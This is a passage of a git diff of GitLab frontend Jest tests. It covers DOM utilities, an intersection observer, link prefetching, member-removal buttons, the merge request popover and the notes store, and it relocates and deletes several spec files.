b/spec/frontend/lib/utils/dom_utils_spec.js index cb8b1c7ca9a..2f240f25d2a 100644 --- a/spec/frontend/lib/utils/dom_utils_spec.js +++ b/spec/frontend/lib/utils/dom_utils_spec.js @@ -6,6 +6,7 @@ import { isElementVisible, isElementHidden, getParents, + setAttributes, } from '~/lib/utils/dom_utils'; const TEST_MARGIN = 5; @@ -208,4 +209,15 @@ describe('DOM Utils', () => { ]); }); }); + + describe('setAttributes', () => { + it('sets multiple attribues on element', () => { + const div = document.createElement('div'); + + setAttributes(div, { class: 'test', title: 'another test' }); + + expect(div.getAttribute('class')).toBe('test'); + expect(div.getAttribute('title')).toBe('another test'); + }); + }); }); diff --git a/spec/frontend/lib/utils/intersection_observer_spec.js b/spec/frontend/lib/utils/intersection_observer_spec.js new file mode 100644 index 00000000000..71b1daffe0d --- /dev/null +++ b/spec/frontend/lib/utils/intersection_observer_spec.js @@ -0,0 +1,86 @@ +import { 
create } from '~/lib/utils/intersection_observer'; + +describe('IntersectionObserver Utility', () => { + beforeAll(() => { + global.IntersectionObserver = class MockIntersectionObserver { + constructor(callback) { + this.callback = callback; + + this.entries = []; + } + + addEntry(entry) { + this.entries.push(entry); + } + + trigger() { + this.callback(this.entries); + } + }; + }); + describe('create', () => { + describe('memoization', () => { + const options = { rootMargin: '1px 1px 1px 1px' }; + let expectedOutput; + + beforeEach(() => { + create.cache.clear(); + expectedOutput = create(options); + }); + + it('returns the same Observer for the same options input', () => { + expect(expectedOutput.id).toBe(create(options).id); + }); + + it('creates a new Observer for unique input options', () => { + expect(expectedOutput.id).not.toBe(create({ rootMargin: '1px 2px 3px 4px' })); + }); + + it('creates a new Observer for the same input options in different object references', () => { + expect(expectedOutput.id).not.toBe(create({ rootMargin: '1px 1px 1px 1px' })); + }); + }); + }); + + describe('Observer behavior', () => { + let observer = null; + let id = null; + + beforeEach(() => { + create.cache.clear(); + ({ observer, id } = create()); + }); + + it.each` + isIntersecting | event + ${false} | ${'IntersectionDisappear'} + ${true} | ${'IntersectionAppear'} + `( + 'should emit the correct event on the entry target based on the computed Intersection', + async ({ isIntersecting, event }) => { + const target = document.createElement('div'); + observer.addEntry({ target, isIntersecting }); + + target.addEventListener(event, (e) => { + expect(e.detail.observer).toBe(id); + }); + + observer.trigger(); + }, + ); + + it('should always emit an Update event with the entry and the observer', () => { + const target = document.createElement('div'); + const entry = { target }; + + observer.addEntry(entry); + + target.addEventListener('IntersectionUpdate', (e) => { + 
expect(e.detail.observer).toBe(id); + expect(e.detail.entry).toStrictEqual(entry); + }); + + observer.trigger(); + }); + }); +}); diff --git a/spec/frontend/lib/utils/navigation_utility_spec.js b/spec/frontend/lib/utils/navigation_utility_spec.js index 88172f38894..6a880a0f354 100644 --- a/spec/frontend/lib/utils/navigation_utility_spec.js +++ b/spec/frontend/lib/utils/navigation_utility_spec.js @@ -1,4 +1,5 @@ import findAndFollowLink from '~/lib/utils/navigation_utility'; +import * as navigationUtils from '~/lib/utils/navigation_utility'; import { visitUrl } from '~/lib/utils/url_utility'; jest.mock('~/lib/utils/url_utility'); @@ -21,3 +22,91 @@ describe('findAndFollowLink', () => { expect(visitUrl).not.toHaveBeenCalled(); }); }); + +describe('prefetchDocument', () => { + it('creates a prefetch link tag', () => { + const linkElement = document.createElement('link'); + + jest.spyOn(document, 'createElement').mockImplementation(() => linkElement); + jest.spyOn(document.head, 'appendChild'); + + navigationUtils.prefetchDocument('index.htm'); + + expect(document.head.appendChild).toHaveBeenCalledWith(linkElement); + expect(linkElement.href).toEqual('http://test.host/index.htm'); + expect(linkElement.rel).toEqual('prefetch'); + expect(linkElement.getAttribute('as')).toEqual('document'); + }); +}); + +describe('initPrefetchLinks', () => { + let newLink; + + beforeEach(() => { + newLink = document.createElement('a'); + newLink.href = 'index_prefetch.htm'; + newLink.classList.add('js-test-prefetch-link'); + document.body.appendChild(newLink); + }); + + it('adds to all links mouse out handlers when hovered', () => { + const mouseOverEvent = new Event('mouseover'); + + jest.spyOn(newLink, 'addEventListener'); + + navigationUtils.initPrefetchLinks('.js-test-prefetch-link'); + newLink.dispatchEvent(mouseOverEvent); + + expect(newLink.addEventListener).toHaveBeenCalled(); + }); + + it('it is not fired when less then 100ms over link', () => { + const mouseOverEvent = new 
Event('mouseover'); + const mouseOutEvent = new Event('mouseout'); + + jest.spyOn(newLink, 'addEventListener'); + jest.spyOn(navigationUtils, 'prefetchDocument').mockImplementation(() => true); + + navigationUtils.initPrefetchLinks('.js-test-prefetch-link'); + newLink.dispatchEvent(mouseOverEvent); + newLink.dispatchEvent(mouseOutEvent); + + expect(navigationUtils.prefetchDocument).not.toHaveBeenCalled(); + }); + + describe('executes correctly when hovering long enough', () => { + const mouseOverEvent = new Event('mouseover'); + + beforeEach(() => { + jest.useFakeTimers(); + + jest.spyOn(global, 'setTimeout'); + jest.spyOn(newLink, 'removeEventListener'); + }); + + it('calls prefetchDocument which adds to document', () => { + jest.spyOn(document.head, 'appendChild'); + + navigationUtils.initPrefetchLinks('.js-test-prefetch-link'); + newLink.dispatchEvent(mouseOverEvent); + + jest.runAllTimers(); + + expect(setTimeout).toHaveBeenCalledWith(expect.any(Function), 100); + expect(document.head.appendChild).toHaveBeenCalled(); + }); + + it('removes Event Listener when fired so only done once', () => { + navigationUtils.initPrefetchLinks('.js-test-prefetch-link'); + newLink.dispatchEvent(mouseOverEvent); + + jest.runAllTimers(); + + expect(newLink.removeEventListener).toHaveBeenCalledWith( + 'mouseover', + expect.any(Function), + true, + ); + }); + }); +}); diff --git a/spec/frontend/members/components/action_buttons/remove_member_button_spec.js b/spec/frontend/members/components/action_buttons/remove_member_button_spec.js index 7eb0ea37fe6..1a031cc56d6 100644 --- a/spec/frontend/members/components/action_buttons/remove_member_button_spec.js +++ b/spec/frontend/members/components/action_buttons/remove_member_button_spec.js @@ -54,6 +54,8 @@ describe('RemoveMemberButton', () => { }); }; + const findButton = () => wrapper.findComponent(GlButton); + beforeEach(() => { createComponent(); }); @@ -66,7 +68,6 @@ describe('RemoveMemberButton', () => { 
expect(wrapper.attributes()).toMatchObject({ 'aria-label': 'Remove member', title: 'Remove member', - icon: 'remove', }); }); @@ -75,8 +76,22 @@ describe('RemoveMemberButton', () => { }); it('calls Vuex action to show `remove member` modal when clicked', () => { - wrapper.findComponent(GlButton).vm.$emit('click'); + findButton().vm.$emit('click'); expect(actions.showRemoveMemberModal).toHaveBeenCalledWith(expect.any(Object), modalData); }); + + describe('button optional properties', () => { + it('has default value for category and text', () => { + createComponent(); + expect(findButton().props('category')).toBe('secondary'); + expect(findButton().text()).toBe(''); + }); + + it('allow changing value of button category and text', () => { + createComponent({ buttonCategory: 'primary', buttonText: 'Decline request' }); + expect(findButton().props('category')).toBe('primary'); + expect(findButton().text()).toBe('Decline request'); + }); + }); }); diff --git a/spec/frontend/members/components/action_buttons/user_action_buttons_spec.js b/spec/frontend/members/components/action_buttons/user_action_buttons_spec.js index 10e451376c8..356df7e7b11 100644 --- a/spec/frontend/members/components/action_buttons/user_action_buttons_spec.js +++ b/spec/frontend/members/components/action_buttons/user_action_buttons_spec.js @@ -13,6 +13,7 @@ describe('UserActionButtons', () => { propsData: { member, isCurrentUser: false, + isInvitedUser: false, ...propsData, }, }); @@ -45,7 +46,9 @@ describe('UserActionButtons', () => { title: 'Remove member', isAccessRequest: false, isInvite: false, - icon: 'remove', + icon: '', + buttonCategory: 'secondary', + buttonText: 'Remove user', userDeletionObstacles: { name: member.user.name, obstacles: parseUserDeletionObstacles(member.user), @@ -129,4 +132,30 @@ describe('UserActionButtons', () => { expect(findRemoveMemberButton().props().memberType).toBe('ProjectMember'); }); }); + + describe('isInvitedUser', () => { + it.each` + isInvitedUser | icon | 
buttonText | buttonCategory + ${true} | ${'remove'} | ${null} | ${'primary'} + ${false} | ${''} | ${'Remove user'} | ${'secondary'} + `( + 'passes the correct props to remove-member-button when isInvitedUser is $isInvitedUser', + ({ isInvitedUser, icon, buttonText, buttonCategory }) => { + createComponent({ + isInvitedUser, + permissions: { + canRemove: true, + }, + }); + + expect(findRemoveMemberButton().props()).toEqual( + expect.objectContaining({ + icon, + buttonText, + buttonCategory, + }), + ); + }, + ); + }); }); diff --git a/spec/frontend/members/components/table/member_action_buttons_spec.js b/spec/frontend/members/components/table/member_action_buttons_spec.js index 546d09732d6..1379b2d26ce 100644 --- a/spec/frontend/members/components/table/member_action_buttons_spec.js +++ b/spec/frontend/members/components/table/member_action_buttons_spec.js @@ -14,6 +14,7 @@ describe('MemberActionButtons', () => { wrapper = shallowMount(MemberActionButtons, { propsData: { isCurrentUser: false, + isInvitedUser: false, permissions: { canRemove: true, }, diff --git a/spec/frontend/pages/milestones/shared/components/delete_milestone_modal_spec.js b/spec/frontend/milestones/components/delete_milestone_modal_spec.js index 1fbec0d996d..8978de0e0e0 100644 --- a/spec/frontend/pages/milestones/shared/components/delete_milestone_modal_spec.js +++ b/spec/frontend/milestones/components/delete_milestone_modal_spec.js @@ -3,8 +3,8 @@ import { TEST_HOST } from 'helpers/test_constants'; import mountComponent from 'helpers/vue_mount_component_helper'; import axios from '~/lib/utils/axios_utils'; import { redirectTo } from '~/lib/utils/url_utility'; -import deleteMilestoneModal from '~/pages/milestones/shared/components/delete_milestone_modal.vue'; -import eventHub from '~/pages/milestones/shared/event_hub'; +import deleteMilestoneModal from '~/milestones/components/delete_milestone_modal.vue'; +import eventHub from '~/milestones/event_hub'; jest.mock('~/lib/utils/url_utility', () => ({ 
...jest.requireActual('~/lib/utils/url_utility'), diff --git a/spec/frontend/milestones/milestone_combobox_spec.js b/spec/frontend/milestones/components/milestone_combobox_spec.js index 4d1a0a0a440..1af39aff30c 100644 --- a/spec/frontend/milestones/milestone_combobox_spec.js +++ b/spec/frontend/milestones/components/milestone_combobox_spec.js @@ -7,7 +7,7 @@ import Vuex from 'vuex'; import { ENTER_KEY } from '~/lib/utils/keys'; import MilestoneCombobox from '~/milestones/components/milestone_combobox.vue'; import createStore from '~/milestones/stores/'; -import { projectMilestones, groupMilestones } from './mock_data'; +import { projectMilestones, groupMilestones } from '../mock_data'; const extraLinks = [ { text: 'Create new', url: 'http://127.0.0.1:3000/h5bp/html5-boilerplate/-/milestones/new' }, diff --git a/spec/frontend/pages/milestones/shared/components/promote_milestone_modal_spec.js b/spec/frontend/milestones/components/promote_milestone_modal_spec.js index 4280a78c202..11eaa92f2b0 100644 --- a/spec/frontend/pages/milestones/shared/components/promote_milestone_modal_spec.js +++ b/spec/frontend/milestones/components/promote_milestone_modal_spec.js @@ -6,7 +6,7 @@ import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; import * as urlUtils from '~/lib/utils/url_utility'; -import PromoteMilestoneModal from '~/pages/milestones/shared/components/promote_milestone_modal.vue'; +import PromoteMilestoneModal from '~/milestones/components/promote_milestone_modal.vue'; jest.mock('~/lib/utils/url_utility'); jest.mock('~/flash'); diff --git a/spec/frontend/milestones/milestone_utils_spec.js b/spec/frontend/milestones/utils_spec.js index f863f31e5a9..82e31c98398 100644 --- a/spec/frontend/milestones/milestone_utils_spec.js +++ b/spec/frontend/milestones/utils_spec.js @@ -1,5 +1,5 @@ import { useFakeDate } from 'helpers/fake_date'; -import { sortMilestonesByDueDate } from 
'~/milestones/milestone_utils'; +import { sortMilestonesByDueDate } from '~/milestones/utils'; describe('sortMilestonesByDueDate', () => { useFakeDate(2021, 6, 22); diff --git a/spec/frontend/mocks/mocks_helper.js b/spec/frontend/mocks/mocks_helper.js deleted file mode 100644 index 295483cd64c..00000000000 --- a/spec/frontend/mocks/mocks_helper.js +++ /dev/null @@ -1,58 +0,0 @@ -/** - * @module - * - * This module implements auto-injected manual mocks that are cleaner than Jest's approach. - * - * See https://docs.gitlab.com/ee/development/testing_guide/frontend_testing.html - */ - -import fs from 'fs'; -import path from 'path'; - -import readdir from 'readdir-enhanced'; - -const MAX_DEPTH = 20; -const prefixMap = [ - // E.g. the mock ce/foo/bar maps to require path ~/foo/bar - { mocksRoot: 'ce', requirePrefix: '~' }, - // { mocksRoot: 'ee', requirePrefix: 'ee' }, // We'll deal with EE-specific mocks later - // { mocksRoot: 'virtual', requirePrefix: '' }, // We'll deal with virtual mocks later -]; - -const mockFileFilter = (stats) => stats.isFile() && stats.path.endsWith('.js'); - -const getMockFiles = (root) => readdir.sync(root, { deep: MAX_DEPTH, filter: mockFileFilter }); - -// Function that performs setting a mock. This has to be overridden by the unit test, because -// jest.setMock can't be overwritten across files. 
-// Use require() because jest.setMock expects the CommonJS exports object -const defaultSetMock = (srcPath, mockPath) => - jest.mock(srcPath, () => jest.requireActual(mockPath)); - -export const setupManualMocks = function setupManualMocks(setMock = defaultSetMock) { - prefixMap.forEach(({ mocksRoot, requirePrefix }) => { - const mocksRootAbsolute = path.join(__dirname, mocksRoot); - if (!fs.existsSync(mocksRootAbsolute)) { - return; - } - - getMockFiles(path.join(__dirname, mocksRoot)).forEach((mockPath) => { - const mockPathNoExt = mockPath.substring(0, mockPath.length - path.extname(mockPath).length); - const sourcePath = path.join(requirePrefix, mockPathNoExt); - const mockPathRelative = `./${path.join(mocksRoot, mockPathNoExt)}`; - - try { - setMock(sourcePath, mockPathRelative); - } catch (e) { - if (e.message.includes('Could not locate module')) { - // The corresponding mocked module doesn't exist. Raise a better error. - // Eventualy, we may support virtual mocks (mocks whose path doesn't directly correspond - // to a module, like with the `ee_else_ce` prefix). 
- throw new Error( - `A manual mock was defined for module ${sourcePath}, but the module doesn't exist!`, - ); - } - } - }); - }); -}; diff --git a/spec/frontend/mocks/mocks_helper_spec.js b/spec/frontend/mocks/mocks_helper_spec.js deleted file mode 100644 index 0abe5c6b949..00000000000 --- a/spec/frontend/mocks/mocks_helper_spec.js +++ /dev/null @@ -1,131 +0,0 @@ -/* eslint-disable global-require */ - -import path from 'path'; - -import axios from '~/lib/utils/axios_utils'; - -const absPath = path.join.bind(null, __dirname); - -jest.mock('fs'); -jest.mock('readdir-enhanced'); - -describe('mocks_helper.js', () => { - let setupManualMocks; - const setMock = jest.fn().mockName('setMock'); - let fs; - let readdir; - - beforeAll(() => { - jest.resetModules(); - jest.setMock = jest.fn().mockName('jest.setMock'); - fs = require('fs'); - readdir = require('readdir-enhanced'); - - // We need to provide setupManualMocks with a mock function that pretends to do the setup of - // the mock. This is because we can't mock jest.setMock across files. 
- setupManualMocks = () => require('./mocks_helper').setupManualMocks(setMock); - }); - - afterEach(() => { - fs.existsSync.mockReset(); - readdir.sync.mockReset(); - setMock.mockReset(); - }); - - it('enumerates through mock file roots', () => { - setupManualMocks(); - expect(fs.existsSync).toHaveBeenCalledTimes(1); - expect(fs.existsSync).toHaveBeenNthCalledWith(1, absPath('ce')); - - expect(readdir.sync).toHaveBeenCalledTimes(0); - }); - - it("doesn't traverse the directory tree infinitely", () => { - fs.existsSync.mockReturnValue(true); - readdir.sync.mockReturnValue([]); - setupManualMocks(); - - const readdirSpy = readdir.sync; - expect(readdirSpy).toHaveBeenCalled(); - readdirSpy.mock.calls.forEach((call) => { - expect(call[1].deep).toBeLessThan(100); - }); - }); - - it('sets up mocks for CE (the ~/ prefix)', () => { - fs.existsSync.mockImplementation((root) => root.endsWith('ce')); - readdir.sync.mockReturnValue(['root.js', 'lib/utils/util.js']); - setupManualMocks(); - - expect(readdir.sync).toHaveBeenCalledTimes(1); - expect(readdir.sync.mock.calls[0][0]).toBe(absPath('ce')); - - expect(setMock).toHaveBeenCalledTimes(2); - expect(setMock).toHaveBeenNthCalledWith(1, '~/root', './ce/root'); - expect(setMock).toHaveBeenNthCalledWith(2, '~/lib/utils/util', './ce/lib/utils/util'); - }); - - it('sets up mocks for all roots', () => { - const files = { - [absPath('ce')]: ['root', 'lib/utils/util'], - [absPath('node')]: ['jquery', '@babel/core'], - }; - - fs.existsSync.mockReturnValue(true); - readdir.sync.mockImplementation((root) => files[root]); - setupManualMocks(); - - expect(readdir.sync).toHaveBeenCalledTimes(1); - expect(readdir.sync.mock.calls[0][0]).toBe(absPath('ce')); - - expect(setMock).toHaveBeenCalledTimes(2); - expect(setMock).toHaveBeenNthCalledWith(1, '~/root', './ce/root'); - expect(setMock).toHaveBeenNthCalledWith(2, '~/lib/utils/util', './ce/lib/utils/util'); - }); - - it('fails when given a virtual mock', () => { - 
fs.existsSync.mockImplementation((p) => p.endsWith('ce')); - readdir.sync.mockReturnValue(['virtual', 'shouldntBeImported']); - setMock.mockImplementation(() => { - throw new Error('Could not locate module'); - }); - - expect(setupManualMocks).toThrow( - new Error("A manual mock was defined for module ~/virtual, but the module doesn't exist!"), - ); - - expect(readdir.sync).toHaveBeenCalledTimes(1); - expect(readdir.sync.mock.calls[0][0]).toBe(absPath('ce')); - }); - - describe('auto-injection', () => { - it('handles ambiguous paths', () => { - jest.isolateModules(() => { - const axios2 = require('../../../app/assets/javascripts/lib/utils/axios_utils').default; - expect(axios2.isMock).toBe(true); - }); - }); - - it('survives jest.isolateModules()', (done) => { - jest.isolateModules(() => { - const axios2 = require('~/lib/utils/axios_utils').default; - expect(axios2.isMock).toBe(true); - done(); - }); - }); - - it('can be unmocked and remocked', () => { - jest.dontMock('~/lib/utils/axios_utils'); - jest.resetModules(); - const axios2 = require('~/lib/utils/axios_utils').default; - expect(axios2).not.toBe(axios); - expect(axios2.isMock).toBeUndefined(); - - jest.doMock('~/lib/utils/axios_utils'); - jest.resetModules(); - const axios3 = require('~/lib/utils/axios_utils').default; - expect(axios3).not.toBe(axios2); - expect(axios3.isMock).toBe(true); - }); - }); -}); diff --git a/spec/frontend/mr_popover/__snapshots__/mr_popover_spec.js.snap b/spec/frontend/mr_popover/__snapshots__/mr_popover_spec.js.snap index 3229492506a..5d84b4660c9 100644 --- a/spec/frontend/mr_popover/__snapshots__/mr_popover_spec.js.snap +++ b/spec/frontend/mr_popover/__snapshots__/mr_popover_spec.js.snap @@ -26,7 +26,7 @@ exports[`MR Popover loaded state matches the snapshot 1`] = ` </div> <span - class="text-secondary" + class="gl-text-secondary" > Opened <time> @@ -45,11 +45,11 @@ exports[`MR Popover loaded state matches the snapshot 1`] = ` <h5 class="my-2" > - MR Title + Updated Title </h5> 
<div - class="text-secondary" + class="gl-text-secondary" > foo/bar!1 @@ -77,14 +77,10 @@ exports[`MR Popover shows skeleton-loader while apollo is loading 1`] = ` /> </div> - <h5 - class="my-2" - > - MR Title - </h5> + <!----> <div - class="text-secondary" + class="gl-text-secondary" > foo/bar!1 diff --git a/spec/frontend/mr_popover/mr_popover_spec.js b/spec/frontend/mr_popover/mr_popover_spec.js index 094d1a6472c..0c6e4211b10 100644 --- a/spec/frontend/mr_popover/mr_popover_spec.js +++ b/spec/frontend/mr_popover/mr_popover_spec.js @@ -15,14 +15,18 @@ describe('MR Popover', () => { }, mocks: { $apollo: { - loading: false, + queries: { + mergeRequest: { + loading: false, + }, + }, }, }, }); }); it('shows skeleton-loader while apollo is loading', () => { - wrapper.vm.$apollo.loading = true; + wrapper.vm.$apollo.queries.mergeRequest.loading = true; return wrapper.vm.$nextTick().then(() => { expect(wrapper.element).toMatchSnapshot(); @@ -33,6 +37,7 @@ describe('MR Popover', () => { it('matches the snapshot', () => { wrapper.setData({ mergeRequest: { + title: 'Updated Title', state: 'opened', createdAt: new Date(), headPipeline: { @@ -64,5 +69,11 @@ describe('MR Popover', () => { expect(wrapper.find(CiIcon).exists()).toBe(false); }); }); + + it('falls back to cached MR title when request fails', () => { + return wrapper.vm.$nextTick().then(() => { + expect(wrapper.text()).toContain('MR Title'); + }); + }); }); }); diff --git a/spec/frontend/notes/components/__snapshots__/notes_app_spec.js.snap b/spec/frontend/notes/components/__snapshots__/notes_app_spec.js.snap new file mode 100644 index 00000000000..5f4b3e04a79 --- /dev/null +++ b/spec/frontend/notes/components/__snapshots__/notes_app_spec.js.snap @@ -0,0 +1,17 @@ +// Jest Snapshot v1, https://goo.gl/fbAQLP + +exports[`note_app when sort direction is asc shows skeleton notes after the loaded discussions 1`] = ` +"<ul id=\\"notes-list\\" class=\\"notes main-notes-list timeline\\"> + <noteable-discussion-stub 
discussion=\\"[object Object]\\" renderdifffile=\\"true\\" helppagepath=\\"\\" isoverviewtab=\\"true\\"></noteable-discussion-stub> + <skeleton-loading-container-stub></skeleton-loading-container-stub> + <discussion-filter-note-stub style=\\"display: none;\\"></discussion-filter-note-stub> +</ul>" +`; + +exports[`note_app when sort direction is desc shows skeleton notes before the loaded discussions 1`] = ` +"<ul id=\\"notes-list\\" class=\\"notes main-notes-list timeline\\"> + <skeleton-loading-container-stub></skeleton-loading-container-stub> + <noteable-discussion-stub discussion=\\"[object Object]\\" renderdifffile=\\"true\\" helppagepath=\\"\\" isoverviewtab=\\"true\\"></noteable-discussion-stub> + <discussion-filter-note-stub style=\\"display: none;\\"></discussion-filter-note-stub> +</ul>" +`; diff --git a/spec/frontend/notes/components/discussion_filter_spec.js b/spec/frontend/notes/components/discussion_filter_spec.js index 6f62b8ba528..17998dfc9d5 100644 --- a/spec/frontend/notes/components/discussion_filter_spec.js +++ b/spec/frontend/notes/components/discussion_filter_spec.js @@ -1,3 +1,4 @@ +import { GlDropdown } from '@gitlab/ui'; import { createLocalVue, mount } from '@vue/test-utils'; import AxiosMockAdapter from 'axios-mock-adapter'; import Vuex from 'vuex'; @@ -88,6 +89,12 @@ describe('DiscussionFilter component', () => { ); }); + it('disables the dropdown when discussions are loading', () => { + store.state.isLoading = true; + + expect(wrapper.findComponent(GlDropdown).props('disabled')).toBe(true); + }); + it('updates to the selected item', () => { const filterItem = findFilter(DISCUSSION_FILTER_TYPES.ALL); diff --git a/spec/frontend/notes/components/discussion_notes_spec.js b/spec/frontend/notes/components/discussion_notes_spec.js index ff840a55535..59ac75f00e6 100644 --- a/spec/frontend/notes/components/discussion_notes_spec.js +++ b/spec/frontend/notes/components/discussion_notes_spec.js @@ -1,7 +1,6 @@ import { getByRole } from 
'@testing-library/dom'; import { shallowMount, mount } from '@vue/test-utils'; import '~/behaviors/markdown/render_gfm'; -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; import DiscussionNotes from '~/notes/components/discussion_notes.vue'; import NoteableNote from '~/notes/components/noteable_note.vue'; import { SYSTEM_NOTE } from '~/notes/constants'; @@ -27,9 +26,6 @@ describe('DiscussionNotes', () => { const createComponent = (props, mountingMethod = shallowMount) => { wrapper = mountingMethod(DiscussionNotes, { store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussion: discussionMock, isExpanded: false, diff --git a/spec/frontend/notes/components/noteable_discussion_spec.js b/spec/frontend/notes/components/noteable_discussion_spec.js index 6aab60edc4e..727ef02dcbb 100644 --- a/spec/frontend/notes/components/noteable_discussion_spec.js +++ b/spec/frontend/notes/components/noteable_discussion_spec.js @@ -3,7 +3,6 @@ import { nextTick } from 'vue'; import discussionWithTwoUnresolvedNotes from 'test_fixtures/merge_requests/resolved_diff_discussion.json'; import { trimText } from 'helpers/text_helper'; import mockDiffFile from 'jest/diffs/mock_data/diff_file'; -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; import DiscussionNotes from '~/notes/components/discussion_notes.vue'; import ReplyPlaceholder from '~/notes/components/discussion_reply_placeholder.vue'; import ResolveWithIssueButton from '~/notes/components/discussion_resolve_with_issue_button.vue'; @@ -32,9 +31,6 @@ describe('noteable_discussion component', () => { wrapper = mount(NoteableDiscussion, { store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussion: discussionMock }, }); }); @@ -171,9 +167,6 @@ describe('noteable_discussion component', () => { wrapper = mount(NoteableDiscussion, { 
store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussion: discussionMock }, }); }); @@ -192,9 +185,6 @@ describe('noteable_discussion component', () => { wrapper = mount(NoteableDiscussion, { store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussion: discussionMock }, }); }); diff --git a/spec/frontend/notes/components/notes_app_spec.js b/spec/frontend/notes/components/notes_app_spec.js index b3dbc26878f..84d94857fe5 100644 --- a/spec/frontend/notes/components/notes_app_spec.js +++ b/spec/frontend/notes/components/notes_app_spec.js @@ -9,7 +9,6 @@ import DraftNote from '~/batch_comments/components/draft_note.vue'; import batchComments from '~/batch_comments/stores/modules/batch_comments'; import axios from '~/lib/utils/axios_utils'; import * as urlUtility from '~/lib/utils/url_utility'; -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; import CommentForm from '~/notes/components/comment_form.vue'; import NotesApp from '~/notes/components/notes_app.vue'; import * as constants from '~/notes/constants'; @@ -79,9 +78,6 @@ describe('note_app', () => { </div>`, }, { - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData, store, }, @@ -378,6 +374,9 @@ describe('note_app', () => { beforeEach(() => { store = createStore(); store.state.discussionSortOrder = constants.DESC; + store.state.isLoading = true; + store.state.discussions = [mockData.discussionMock]; + wrapper = shallowMount(NotesApp, { propsData, store, @@ -390,11 +389,18 @@ describe('note_app', () => { it('finds CommentForm before notes list', () => { expect(getComponentOrder()).toStrictEqual([TYPE_COMMENT_FORM, TYPE_NOTES_LIST]); }); + + it('shows skeleton notes before the loaded discussions', () => { + expect(wrapper.find('#notes-list').html()).toMatchSnapshot(); + }); }); describe('when 
sort direction is asc', () => { beforeEach(() => { store = createStore(); + store.state.isLoading = true; + store.state.discussions = [mockData.discussionMock]; + wrapper = shallowMount(NotesApp, { propsData, store, @@ -407,6 +413,10 @@ describe('note_app', () => { it('finds CommentForm after notes list', () => { expect(getComponentOrder()).toStrictEqual([TYPE_NOTES_LIST, TYPE_COMMENT_FORM]); }); + + it('shows skeleton notes after the loaded discussions', () => { + expect(wrapper.find('#notes-list').html()).toMatchSnapshot(); + }); }); describe('when multiple draft types are present', () => { diff --git a/spec/frontend/notes/stores/actions_spec.js b/spec/frontend/notes/stores/actions_spec.js index bbe074f0105..7424a87bc0f 100644 --- a/spec/frontend/notes/stores/actions_spec.js +++ b/spec/frontend/notes/stores/actions_spec.js @@ -1183,8 +1183,14 @@ describe('Actions Notes Store', () => { dispatch.mockReturnValue(new Promise(() => {})); }); + it('clears existing discussions', () => { + actions.filterDiscussion({ commit, dispatch }, { path, filter, persistFilter: false }); + + expect(commit.mock.calls).toEqual([[mutationTypes.CLEAR_DISCUSSIONS]]); + }); + it('fetches discussions with filter and persistFilter false', () => { - actions.filterDiscussion({ dispatch }, { path, filter, persistFilter: false }); + actions.filterDiscussion({ commit, dispatch }, { path, filter, persistFilter: false }); expect(dispatch.mock.calls).toEqual([ ['setLoadingState', true], @@ -1193,7 +1199,7 @@ describe('Actions Notes Store', () => { }); it('fetches discussions with filter and persistFilter true', () => { - actions.filterDiscussion({ dispatch }, { path, filter, persistFilter: true }); + actions.filterDiscussion({ commit, dispatch }, { path, filter, persistFilter: true }); expect(dispatch.mock.calls).toEqual([ ['setLoadingState', true], diff --git a/spec/frontend/notes/stores/mutation_spec.js b/spec/frontend/notes/stores/mutation_spec.js index c9e24039b64..da1547ab6e7 100644 --- 
a/spec/frontend/notes/stores/mutation_spec.js +++ b/spec/frontend/notes/stores/mutation_spec.js @@ -159,6 +159,18 @@ describe('Notes Store mutations', () => { }); }); + describe('CLEAR_DISCUSSIONS', () => { + it('should set discussions to an empty array', () => { + const state = { + discussions: [discussionMock], + }; + + mutations.CLEAR_DISCUSSIONS(state); + + expect(state.discussions).toEqual([]); + }); + }); + describe('ADD_OR_UPDATE_DISCUSSIONS', () => { it('should set the initial notes received', () => { const state = { diff --git a/spec/frontend/packages/shared/utils_spec.js b/spec/frontend/packages/shared/utils_spec.js deleted file mode 100644 index a1076b729f8..00000000000 --- a/spec/frontend/packages/shared/utils_spec.js +++ /dev/null @@ -1,69 +0,0 @@ -import { PackageType, TrackingCategories } from '~/packages/shared/constants'; -import { - packageTypeToTrackCategory, - beautifyPath, - getPackageTypeLabel, - getCommitLink, -} from '~/packages/shared/utils'; -import { packageList } from '../mock_data'; - -describe('Packages shared utils', () => { - describe('packageTypeToTrackCategory', () => { - it('prepend UI to package category', () => { - expect(packageTypeToTrackCategory()).toMatchInlineSnapshot(`"UI::undefined"`); - }); - - it.each(Object.keys(PackageType))('returns a correct category string for %s', (packageKey) => { - const packageName = PackageType[packageKey]; - expect(packageTypeToTrackCategory(packageName)).toBe( - `UI::${TrackingCategories[packageName]}`, - ); - }); - }); - - describe('beautifyPath', () => { - it('returns a string with spaces around /', () => { - expect(beautifyPath('foo/bar')).toBe('foo / bar'); - }); - it('does not fail for empty string', () => { - expect(beautifyPath()).toBe(''); - }); - }); - - describe('getPackageTypeLabel', () => { - describe.each` - packageType | expectedResult - ${'conan'} | ${'Conan'} - ${'maven'} | ${'Maven'} - ${'npm'} | ${'npm'} - ${'nuget'} | ${'NuGet'} - ${'pypi'} | ${'PyPI'} - ${'rubygems'} | 
